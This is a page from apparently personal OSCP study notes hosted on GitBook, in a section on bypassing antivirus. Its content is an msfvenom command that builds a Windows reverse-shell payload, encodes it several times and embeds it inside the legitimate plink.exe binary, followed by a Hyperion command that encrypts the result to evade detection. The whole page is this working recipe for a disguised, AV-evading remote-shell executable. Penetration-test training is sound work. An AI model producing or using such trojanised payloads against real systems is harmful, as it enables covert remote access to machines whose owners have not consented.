💻
oscp-study-notes
  • What is this?
  • Scanning & Enumeration
    • FTP 21
    • SMTP 25
    • HTTP/HTTPS 80/443/*
    • SMB 139/443
  • Vulnerabilites & Exploitation
    • Socket Programming
    • Generate shellcodes
    • Shellshock
    • Cross Compiling
    • LFI/RFI
    • SQL Injection
    • CVE2009-3103
    • MS17-010
  • Privilege Escalation
  • File Transfers
  • Buffer Overflow
  • Port Redirection and Tunneling
  • Password Cracking
  • Proof
  • Netcat
  • Third-party Tools
  • Bypass AV
  • Methodology
  • Writing a report
  • Further Reading
Powered by GitBook
On this page
  • Encode & Embed payload in an executable file
  • Hyperion (PE encryption)

Was this helpful?

Bypass AV

Encode & Embed payload in an executable file

msfvenom -p windows/shell_reverse_tcp LHOST=$VICTIM_IP LPORT=$VICTIM_PORT \
    -f exe -e x86/shikata_ga_nai -i 9 \
    -x /usr/share/windows-binaries/plink.exe \
    -o encoded_shell.exe 

Hyperion (PE encryption)

wine hyperion.exe ../encoded_shell.exe ../crypted.exe

PreviousThird-party ToolsNextMethodology

Last updated 5 years ago

Was this helpful?